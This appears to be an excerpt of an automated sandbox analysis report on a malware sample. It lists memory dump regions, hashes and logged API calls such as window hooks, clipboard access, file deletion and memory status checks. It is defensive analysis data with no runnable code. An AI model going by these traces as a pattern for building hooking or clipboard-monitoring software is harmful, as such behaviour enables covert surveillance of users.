                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: 3e48889ccede5b814687084f5739a2f85d51f82a0be44d478bb29cf86eef2ef6
                                                                                                                    • Instruction ID: cdd7b4641b195d8bc238bc2ea623ae28d2d0882ced3077df6505a41ac6f7f9dd
                                                                                                                    • Opcode Fuzzy Hash: 3e48889ccede5b814687084f5739a2f85d51f82a0be44d478bb29cf86eef2ef6
                                                                                                                    • Instruction Fuzzy Hash: 9A311FB0D01308EFDB10CF99C984BCEBBF5AF48304F20801AE505AB394CBB5A946CB65
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: 2084aaffc1a53713a6c9f2731116443d2a66af5f53bdb5db03a0ab5d2b56998f
                                                                                                                    • Instruction ID: 2129718cdf381205293a1b304312dfc0db538b4f5f7c6cd85c9e97aec96fc8b3
                                                                                                                    • Opcode Fuzzy Hash: 2084aaffc1a53713a6c9f2731116443d2a66af5f53bdb5db03a0ab5d2b56998f
                                                                                                                    • Instruction Fuzzy Hash: 6C31FFB0D01348EFDB14CF99C984BDEBBF1AF48304F24811AE505AB294CBB5A946CB65
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DA9F5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 13c2e942887797e85c36fe46b046e3cebadcc2b2486c4afbfb2b8c9167611b88
                                                                                                                    • Instruction ID: d34902c09a79bf67ddf7221f31959f7153f49c2d01466ee47b4ab3a01633d63c
                                                                                                                    • Opcode Fuzzy Hash: 13c2e942887797e85c36fe46b046e3cebadcc2b2486c4afbfb2b8c9167611b88
                                                                                                                    • Instruction Fuzzy Hash: D321E3B5900348AFDB10CFAAD984ADEBFF9EB48310F14801AE958A7350D374A954DFA5
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DA9F5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: d5ee37642f2d86b55bcd8a886546e2740b93deb905b34ec35b845624dcda5af2
                                                                                                                    • Instruction ID: b83f525ad5fa3b95840944d38abdd7f451306781b52f95dde230574693f37d58
                                                                                                                    • Opcode Fuzzy Hash: d5ee37642f2d86b55bcd8a886546e2740b93deb905b34ec35b845624dcda5af2
                                                                                                                    • Instruction Fuzzy Hash: 9121E4B5900348AFDB10CFAAD884ADEBFF8EB48310F14801AE918A7350D374A944CF64
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 018E80B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.2974653019.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_18e0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 1952705fc4db7c8fc559a5229377fb3fe76e6072c14fb28558a39e65b1f6cd13
                                                                                                                    • Instruction ID: ebb5eff8bfca96698a50cb94035d3b9be521111065a1b6e45536b96a476e8f2b
                                                                                                                    • Opcode Fuzzy Hash: 1952705fc4db7c8fc559a5229377fb3fe76e6072c14fb28558a39e65b1f6cd13
                                                                                                                    • Instruction Fuzzy Hash: 2F2147B1C006199FCB14CFAAD4446DEFBF4FB49320F11811AD918A7340D774AA44CFA5
                                                                                                                    APIs
                                                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DAD66B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HookWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2559412058-0
                                                                                                                    • Opcode ID: 520f2641ba16cf19caae1040f078618225b715c47d31f3d20ea4a2b04fed2248
                                                                                                                    • Instruction ID: dc5339c983c8ce48adf7be8bdc6273f410d56872b4be01b08ed3b808f375bd2e
                                                                                                                    • Opcode Fuzzy Hash: 520f2641ba16cf19caae1040f078618225b715c47d31f3d20ea4a2b04fed2248
                                                                                                                    • Instruction Fuzzy Hash: 1F21F0B5D042099FCB14DF9AC844BEEBBF5BB88310F14842AE429A7390C775A944CFA5
                                                                                                                    APIs
                                                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06DAD66B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HookWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2559412058-0
                                                                                                                    • Opcode ID: f8aacdcee418ad76564b0ddd1e0e65478c2246769cb2b7710bfa91daa3d8dfc8
                                                                                                                    • Instruction ID: 24b9c587b4dc78c9be0c9592f2657c6a4a5b64ae6e7004b5aca33a4896a952c6
                                                                                                                    • Opcode Fuzzy Hash: f8aacdcee418ad76564b0ddd1e0e65478c2246769cb2b7710bfa91daa3d8dfc8
                                                                                                                    • Instruction Fuzzy Hash: FD2113B1D042099FCB14DF9AC844BEEFBF5AF88310F14842AD419A7390C774A944CFA5
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 018E80B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.2974653019.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_18e0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 7544d92093fe54e17100391337bad70196471091ddaa973451d60c5907a20e7d
                                                                                                                    • Instruction ID: 6a774d2a011256beeb9b207fe8b9d01480ff913a7ec3f3f3107adcc70e0c30e9
                                                                                                                    • Opcode Fuzzy Hash: 7544d92093fe54e17100391337bad70196471091ddaa973451d60c5907a20e7d
                                                                                                                    • Instruction Fuzzy Hash: 291133B1C0065A9FCB14CF9AC444A9EFBF4FB49320F15812AD928A7340D778AA44CFA5
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06DAB075), ref: 06DAB0FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: bf74ab5e13561ada4ece4badca230df4cdec59a0d5348c493f04212cf902c5dc
                                                                                                                    • Instruction ID: 2a153e968c67570ba79df4a31a96b8031bae78664f488f01a6f6608d8038adf7
                                                                                                                    • Opcode Fuzzy Hash: bf74ab5e13561ada4ece4badca230df4cdec59a0d5348c493f04212cf902c5dc
                                                                                                                    • Instruction Fuzzy Hash: E01176B08003088FCB20CF9AD945BDEBBF8EB48324F20801AE518A3240C375A944CFA5
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 018EEFDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.2974653019.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_18e0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: 5043d1769f192ea00a697d076fe975cd5e97882407e0575452a15f0d7eddeb8e
                                                                                                                    • Instruction ID: b2fc84fe4e4eb80ee7a756c4091537629603c0c377691a7416badeae1c6f01ec
                                                                                                                    • Opcode Fuzzy Hash: 5043d1769f192ea00a697d076fe975cd5e97882407e0575452a15f0d7eddeb8e
                                                                                                                    • Instruction Fuzzy Hash: 7211F3B1C006599BDB10DF9AC448BDEFBF4FF48320F15816AE918A7241D778AA44CFA5
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06DAB9BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: 971e07f5539616a9b6e4dac084423633489c034354997405b758186aba53548e
                                                                                                                    • Instruction ID: 5cbcceece60807a48653b9b40bb338691d7c8720fa6c83c062c7aff7cf08f9a3
                                                                                                                    • Opcode Fuzzy Hash: 971e07f5539616a9b6e4dac084423633489c034354997405b758186aba53548e
                                                                                                                    • Instruction Fuzzy Hash: 0F1133B58043488FDB20DF9AD945BDEBBF8EB48320F20841AD559A7310D779A944CFA6
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06DA4F96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 40a979be834bf97e2a4d2239b9ad0ee00f43b2ff4c70ac0d8de587580ead8e14
                                                                                                                    • Instruction ID: d6926a0b0ad2f1876627b78a78d690cb160979feed48124c7d657359beb4543b
                                                                                                                    • Opcode Fuzzy Hash: 40a979be834bf97e2a4d2239b9ad0ee00f43b2ff4c70ac0d8de587580ead8e14
                                                                                                                    • Instruction Fuzzy Hash: 14113FB5C043488FCB10DF9AD844ADEFBF4EB88220F11842ED829B7210C3B9A544CFA0
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06DA4F96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 76a2b969bed7db7e0615223c95886f56ef2eebd91b825d5d67e8d2263a89648b
                                                                                                                    • Instruction ID: 1500f0fd0b354d5c5dae845241cdae3114213499da367bc487403a64b377ed45
                                                                                                                    • Opcode Fuzzy Hash: 76a2b969bed7db7e0615223c95886f56ef2eebd91b825d5d67e8d2263a89648b
                                                                                                                    • Instruction Fuzzy Hash: 521110B5C003498FCB10DF9AD844ADEFBF4EB88320F11842AD429B7250C3B9A545CFA1
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06DAB9BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: 186ec71c409542aea01b821e2e12356a57a8d2130215081eeec65741ba6248d2
                                                                                                                    • Instruction ID: 39b27eff25bfd7432778860a36ed006dffcbba3fbfb05f78287fe242aaafa006
                                                                                                                    • Opcode Fuzzy Hash: 186ec71c409542aea01b821e2e12356a57a8d2130215081eeec65741ba6248d2
                                                                                                                    • Instruction Fuzzy Hash: D81103B58043488FCB10DF9AD548BCEBFF8EB48320F24845AD558A7310C375A544CFA5
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06DAB9BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: 1d8d3476d1605773d78ba2b59a4e050ef1bbce3a6565ea9bd9946233c5e57865
                                                                                                                    • Instruction ID: 9fbac94a73df9366a55b939767ce5403209ce890f6a6302e47b29bc11a415440
                                                                                                                    • Opcode Fuzzy Hash: 1d8d3476d1605773d78ba2b59a4e050ef1bbce3a6565ea9bd9946233c5e57865
                                                                                                                    • Instruction Fuzzy Hash: 5A1142B18043488FCB20DF9AD588BDEBBF8EB48320F20841AD518B3300C378A944CFA5
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06DAB075), ref: 06DAB0FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: 3862a5e3832d5b8654ea6f4797be57fa9ce3d1525374a881c926ab24b6171d20
                                                                                                                    • Instruction ID: f0d2438d718db6b557b3db74c40ffd1b826415c3d12fe6f08e807b5ea6ec945e
                                                                                                                    • Opcode Fuzzy Hash: 3862a5e3832d5b8654ea6f4797be57fa9ce3d1525374a881c926ab24b6171d20
                                                                                                                    • Instruction Fuzzy Hash: 8A1133B08043488FCB20DF9AD848BDEBBF4EB48324F20841AD519A3340C775A944CFA4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: e6749b72e53c3973ee3806f5affb3e3443bb36d5806a26087de5c7411b160588
                                                                                                                    • Instruction ID: fa1eda9b898007734f206aac437d972625f193f84428535b36a179c398d1494b
                                                                                                                    • Opcode Fuzzy Hash: e6749b72e53c3973ee3806f5affb3e3443bb36d5806a26087de5c7411b160588
                                                                                                                    • Instruction Fuzzy Hash: 2741BF70E00319DFDB61DFA5D8546AEBBB3BF89300F204529E406EB284EB70D946CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: bfa66b14b5be82550e50287411014965728a578eabef933460afe4d3244b2b33
                                                                                                                    • Instruction ID: eebef9ddf4b765ac9ca86e3e8bad61b3699a45ba36f5661509bdd06ee937fe39
                                                                                                                    • Opcode Fuzzy Hash: bfa66b14b5be82550e50287411014965728a578eabef933460afe4d3244b2b33
                                                                                                                    • Instruction Fuzzy Hash: AE31EF31B00205CFDB6A9B78C4586BF7AE2AF89301F20442DD406DB388DE35DE46C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q
                                                                                                                    • API String ID: 0-388095546
                                                                                                                    • Opcode ID: b7ca3e6cf4089a03304d655857d585d75325dfe7762dba0817c2865fcd63c6d5
                                                                                                                    • Instruction ID: b4812fdf085517b08f3bc97311c28adfd2cc732473ae71c05d4e81a0efea55e2
                                                                                                                    • Opcode Fuzzy Hash: b7ca3e6cf4089a03304d655857d585d75325dfe7762dba0817c2865fcd63c6d5
                                                                                                                    • Instruction Fuzzy Hash: F9F0DC31B00226DFDF648F98E9846E873AEEB48310F15546AC807CB248CA35D906DB92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \Ocq
                                                                                                                    • API String ID: 0-2995510325
                                                                                                                    • Opcode ID: a37ac2e0febd593cbb0fc35dcd1669890a032a1315013ae0fcb5cf074f7bdb32
                                                                                                                    • Instruction ID: 6af4f9b355f90c28894e52717867aad8236ad6c640370c6f7abc788d70934302
                                                                                                                    • Opcode Fuzzy Hash: a37ac2e0febd593cbb0fc35dcd1669890a032a1315013ae0fcb5cf074f7bdb32
                                                                                                                    • Instruction Fuzzy Hash: D1F0DA30A10129EBDB14DF94E899BAEBBB2FF88701F214119E502A7399CB745C45CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 27ee7c117d176d88502da0f840f5490f091efb074c846a3a9c72c94c6944cd15
                                                                                                                    • Instruction ID: ca1828cc55c35377696af49d550f869d5a5bd3b8d926dfcbaa2e43cc4e5c59ad
                                                                                                                    • Opcode Fuzzy Hash: 27ee7c117d176d88502da0f840f5490f091efb074c846a3a9c72c94c6944cd15
                                                                                                                    • Instruction Fuzzy Hash: B5327174B20215DFDB54DB68E484AADBBF2FB88310F109529E40ADB355DB35EC42CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4700f5b43bc41c9ce5a551c68d0306f09c394d4345f324822ae4392b8035c31c
                                                                                                                    • Instruction ID: 0eada17df13f3d551af1eeea888699fc1adcfecc300887dea5580c0146057728
                                                                                                                    • Opcode Fuzzy Hash: 4700f5b43bc41c9ce5a551c68d0306f09c394d4345f324822ae4392b8035c31c
                                                                                                                    • Instruction Fuzzy Hash: 46222D74E10209CFDF64CB68D494BEDB7A1EB49310F24946AE44ADB399DE34DC81CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e82e2c016c222cb922bb6e19f832f5f29219c91ce63c5cc3febc7a964887fb6
                                                                                                                    • Instruction ID: 6eec05b57ddfcc84c9f33f4098cda2178d5761ca66b28f007dda3c45339aad72
                                                                                                                    • Opcode Fuzzy Hash: 7e82e2c016c222cb922bb6e19f832f5f29219c91ce63c5cc3febc7a964887fb6
                                                                                                                    • Instruction Fuzzy Hash: 7D61C171F001218FCB509B7EC8846AFBAD7AFD5620B29443AD80EDB364DE65DD0287D6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e542eab43567222120b7bd61daf1ff931807e10085e1290611aa27cb5e21faad
                                                                                                                    • Instruction ID: fc85b4ef8406d5fb71a1a7a7b40558632688114406712d0313b610b5c7a4b43b
                                                                                                                    • Opcode Fuzzy Hash: e542eab43567222120b7bd61daf1ff931807e10085e1290611aa27cb5e21faad
                                                                                                                    • Instruction Fuzzy Hash: 41813E30B002069FDF54DFA9D4546AEB7F6AF89304F118429D40ADB399DF74DC828B92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56d387eb2bf526b2d54dfa0f2f40f4055e68638db48219b9bb6d7a191ed40587
                                                                                                                    • Instruction ID: 12dd437a0dbcd829497faf8a71471e14fc0294dafee6dabbb170da9dacfe1628
                                                                                                                    • Opcode Fuzzy Hash: 56d387eb2bf526b2d54dfa0f2f40f4055e68638db48219b9bb6d7a191ed40587
                                                                                                                    • Instruction Fuzzy Hash: C5913D34E102198BDF60DF68C890BDDB7B1FF89310F208699D549BB359DB70AA85CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e099f537b103b3596a0421a80fe7dd6b0db703d3af8151d8dcc5237df739885
                                                                                                                    • Instruction ID: 3aa7c20f94251d0a43f08ac6b51f2355e800ab24a94837d619fdbc658121a21a
                                                                                                                    • Opcode Fuzzy Hash: 9e099f537b103b3596a0421a80fe7dd6b0db703d3af8151d8dcc5237df739885
                                                                                                                    • Instruction Fuzzy Hash: AB912D34E102198BDF60DF68C880BDDB7B1FF89310F208599D549AB259DB70AA85CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e58edf0e32351d112c117cb6084a4dbd427b9a3632eb14414f26ae01dd9e9273
                                                                                                                    • Instruction ID: 024936e1795800dbe95e31fae526aed6c116375bb50524f81822206508192c16
                                                                                                                    • Opcode Fuzzy Hash: e58edf0e32351d112c117cb6084a4dbd427b9a3632eb14414f26ae01dd9e9273
                                                                                                                    • Instruction Fuzzy Hash: C8713A70A00209DFDB54DFA9D984A9DBBF6FF84300F249529D40AEB268DB30ED46CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0320943ce68f8e1e99de1608b2bc57610f74aa69a020204e968da489a9c2708
                                                                                                                    • Instruction ID: dab3a026836368f7f9e93a73e9ab3e943910b0954a6f3800244dcd3a9f6439df
                                                                                                                    • Opcode Fuzzy Hash: a0320943ce68f8e1e99de1608b2bc57610f74aa69a020204e968da489a9c2708
                                                                                                                    • Instruction Fuzzy Hash: 04711A70A002099FDB54DFA9D984A9DBBF6FF84300F149469D40AEB358DB30ED46CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5a0da425d96aefd38053fb2ba07bbe1fcc7a683ee2730b3e3bb3c8f130004a5e
                                                                                                                    • Instruction ID: cba7116b3a7d29388b13f2f9a41d9cbf6cd4b7b89698ab6184e7ccf04acfd5af
                                                                                                                    • Opcode Fuzzy Hash: 5a0da425d96aefd38053fb2ba07bbe1fcc7a683ee2730b3e3bb3c8f130004a5e
                                                                                                                    • Instruction Fuzzy Hash: 8E51E531E00105DFDF64EF78E8486EDB7B2FB88315F10886AE11AD7299DB358999C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cad7af9b472802a131a57592f29222933ce728303deaaf095d5d42389cb1676f
